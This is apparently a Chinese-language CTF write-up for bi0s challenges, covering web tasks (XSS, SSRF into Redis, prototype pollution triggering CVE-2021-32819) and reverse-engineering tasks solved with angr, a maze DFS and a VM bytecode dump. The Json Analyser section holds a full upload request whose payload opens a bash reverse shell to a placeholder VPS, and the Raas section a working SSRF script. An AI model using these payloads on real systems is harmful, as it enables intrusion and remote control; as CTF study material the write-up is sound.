web
MD Notes
gomarkdown
模块在解析代码块语法时,没有对代码类型(语言)标注做 HTML 实体编码,标注内容会原样写入生成的 HTML。
故在代码类型标注处输入以下字符串便可导致 XSS(修复思路:对该标注做实体编码,或对渲染后的 HTML 再做净化)
保存后,发送给机器人
随后vps监听静候佳音
Raas
import requests
# Challenge endpoint that accepts a URL and fetches it server-side.
url = "http://web.challenge.bi0s.in:6969/"
userID = "ccc"

# The submitted URL names the host "redis" on port 6379 and carries one SET
# command in its path, i.e. the fetcher is used to reach a data store that the
# client cannot reach directly (server-side request forgery).
# Defensive takeaway: allow-list the schemes and destination hosts a URL
# fetcher may use, and require authentication on internal data stores.
# NOTE: the command is built first so that the "%" formatting visibly applies
# to the whole command; the resulting string is unchanged.
redis_command = "set " + userID + "_isAdmin yes\r\n"
data = {"url": "inctf://redis:6379/_%s" % redis_command}
requests.post(url, data=data)

# Revisit the site with the same userID cookie and show the cookie it sets.
res = requests.get(url, cookies={"userID": userID})
print(res.headers["Set-Cookie"])
Json Analyser
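waf.py 中的 ujson 模块有解析问题,传入 \u0073uperuser","name":"admin
即可绕过检查、拿到 pin 码(从载荷看,应是用 \u0073 转义避开对 superuser 的关键字检查,同时借引号带入额外的 name 字段,具体以 waf.py 源码为准;防御上应对解析后的取值做校验,而不是对原始字符串做匹配)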
app.js中读取上传的package.json
设置文件后展示。因为模板使用了旧版本squirrelly
模块,存在CVE-2021-32819
此cve需要在模板render
时传入{"defaultFilter":"e'); [js code];//"}
,但原代码中是
res.render('index.squirrelly', {'output':output})
无法直接传入defaultFilter
。考虑在读取上传的package.json
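设置文件时可能存在原型链污染:一旦 defaultFilter 被写到 Object.prototype 上,渲染时的选项对象就会继承到它。防御上应升级 squirrelly,并在合并用户提交的 JSON 时拒绝 constructor、prototype、__proto__ 等键。故上传文件如下: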
POST /upload HTTP/1.1
Host: jsonanalyser.challenge.bi0s.in:41897
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4731849084053322511847680923
Content-Length: 1002
Origin: http://jsonanalyser.challenge.bi0s.in:51219
Connection: close
Referer: http://jsonanalyser.challenge.bi0s.in:51219/
Upgrade-Insecure-Requests: 1
-----------------------------4731849084053322511847680923
Content-Disposition: form-data; name="uploadFile"; filename="package.json"
Content-Type: application/octet-stream
{
"constructor":{"prototype":{"defaultFilter":"e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps-ip/vps-port 0>&1\"'); //"}},
"name": "aaa",
"version": "1.0.0",
"description": "",
"main": "app.js",
"dependencies": {
"config-handler": "^2.0.3",
"express": "^4.17.1",
"express-fileupload": "^1.2.1",
"nodemon": "^2.0.12",
"squirrelly": "^8.0.8"
},
"devDependencies": {},
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "",
"license": "ISC"
}
-----------------------------4731849084053322511847680923
Content-Disposition: form-data; name="pin"
673307-0496-1001122
-----------------------------4731849084053322511847680923--
rev
find_plut0
签到题,直接用angr秒了
import angr
import claripy
from z3 import *
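# Symbolic 30-byte buffer standing in for the unknown flag.
flag = claripy.BVS("flag", 8 * 30)
p = angr.Project("binaries/find_plut0")
base = 0x400000  # every offset below is added to this base address

# Start from a blank state at offset 0xBA0 and place the symbolic buffer at
# offset 0x202100, the same location the result is read back from later.
state = p.factory.blank_state(addr=base + 0xBA0)
state.memory.store(base + 0x202100, flag)

# Restrict every byte to printable ASCII. The upper bound is 126 ('~') so that
# DEL (0x7f) and 0x80 are excluded; a bound of 128 would admit both.
for byte in flag.chop(8):
    state.add_constraints(byte >= 32)   # ' '
    state.add_constraints(byte <= 126)  # '~'

# Build the simulation manager only after the state is fully constrained.
sim = p.factory.simgr(state)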
def myfind(state):
    """Report whether *state* has reached the target address.

    Prints the concrete instruction pointer of every state it is asked
    about, then returns True only when that address equals base + 0xADB.
    """
    current_ip = state.solver.eval(state.regs.rip)
    print(hex(current_ip))
    return current_ip == base + 0xADB
# Explore until myfind accepts a state, discarding any path that reaches
# offset 0xAFD.
res = sim.explore(find=myfind, avoid=[base + 0xAFD])
print(res.found)

# Concretise the answer from the first accepted state twice: once from the
# bytes now stored at offset 0x202100, once from the original symbolic buffer.
solved = res.found[0]
stored_flag = solved.memory.load(base + 0x202100, 30)
for candidate in (stored_flag, flag):
    print(solved.solver.eval(candidate, cast_to=bytes))
REplica
简单的 rust 逆向
输入从命令行读入;在比较位置下断点,提取参与比较的数据观察即可。下面的脚本用 t1 与 t2 之间的位置对应关系,把 target 还原成原始输入。
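# Scrambled string to be put back into its original order.
target = '0kedtZ6fYO3aX4lPNMSgQbRwh'
# Presumably a probe input (t1) and the form it took at the comparison (t2);
# the script only relies on t2 being a rearrangement of t1's characters.
t1 = '0123456789XABCDEFGHIJKLMN'
t2 = 'NMKG98F76JED54LICB32HAX10'

# t3[i] is the position in t1 of the character found at position i of t2.
# str.index raises ValueError for a character missing from t1, whereas
# str.find would return -1 and silently overwrite the last output slot.
t3 = [t1.index(c) for c in t2]

# Undo the permutation: the character at target[i] belongs at index t3[i].
result = [0] * len(target)
for src, ch in zip(t3, target):
    result[src] = ch
print("".join(result))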
miz
简单的 rust 逆向,地图题
#include<iostream>
#include<cstdio>
using namespace std;
// Array capacity; the maze itself occupies only the first 25 rows and columns,
// which is the bound dfs() checks against.
const int N=30;
// Per-direction deltas for the first (dx) and second (dy) array index.
int dx[]={-1,1,0,0};
int dy[]={0,0,-1,1};
// Character printed for each direction index 0..3, in the same order as dx/dy.
char ha[]={'j','k','h','l'};
// Maze grid. dfs() never enters a cell holding 1 and prints the recorded path
// when it reaches the cell holding 2; the single 3 sits at a[sx][sy].
int a[N][N]={
{1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
{1,0,1,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,1,0,1},
{1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,0,1,0,1},
{1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1},
{1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1},
{1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,1},
{1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1},
{1,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1},
{1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1},
{1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1},
{1,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1},
{1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1},
{1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1},
{1,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,1},
{1,0,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,1},
{1,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1},
{1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1},
{1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,1},
{1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,1},
{1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1},
{1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1,0,1},
{1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1},
{1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1},
{1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1},
{1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1}};
// sx/sy: cell the search starts from. s/top: stack of direction indices for
// the current path, filled from index 1 (dfs pushes with s[++top]).
int sx=1,sy=0xD,s[1005],top;
// v[x][y] is set while cell (x, y) is on the current path.
bool v[N][N];
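// Depth-first search from cell (x, y) that prints every path to the goal.
// Each step pushes its direction index onto s[]; on reaching the cell that
// holds 2, the stack is printed as one line of characters taken from ha[].
// Cells are marked in v[] while on the current path and unmarked on the way
// back, so every simple path is enumerated.
void dfs(int x, int y)
{
    if (a[x][y] == 2)
    {
        // The listing had lost the index expression here; each stored
        // direction s[i] selects its character from ha[].
        for (int i = 1; i <= top; i++)
            printf("%c", ha[s[i]]);
        puts("");
        return;
    }
    for (int i = 0; i < 4; i++)
    {
        int nx = x + dx[i];
        int ny = y + dy[i];
        // Stay inside the 25x25 maze, skip cells already on the path, and
        // never step onto a cell holding 1.
        if (nx >= 0 && nx < 25 && ny >= 0 && ny < 25 && !v[nx][ny] && a[nx][ny] != 1)
        {
            v[nx][ny] = 1;
            s[++top] = i;
            dfs(nx, ny);
            v[nx][ny] = 0;
            top--;
        }
    }
}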
int main()
{
    // Mark the start cell as visited before searching so that no path
    // re-enters it, then enumerate the paths from there.
    v[sx][sy] = true;
    dfs(sx, sy);
    return 0;
}
Adventures of Lonely Knight
模拟器 + 调试器: https://github.com/SourMesen/Mesen/releases
参考链接: https://blog.attify.com/flare-on-6-ctf-writeup-part8/
这道题的思路大概是:先在内存中找到血量,再对它下内存断点,定位到读写血量的代码附近。
接着分析死亡逻辑,找到关键变量地址 0x68,只要该值不为 0 就可以直接通关。
钥匙判断逻辑
FlagChecker
虚拟机逆向,需要编写 decompiler
bytecode = [0x00000006, 0x00000000, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x00000008, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000010, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000018, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x0000001F, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x0000008C, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 
0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 
0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 
0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000001, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x00000009, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000011, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000019, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x000000E1, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 
0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000002, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000A, 0x0000000B, 0x00000004, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000012, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001A, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x00000020, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x0000012B, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 
0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 
0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 
0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000003, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000B, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000013, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001B, 0x0000000B, 0x00000007, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x00000167, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 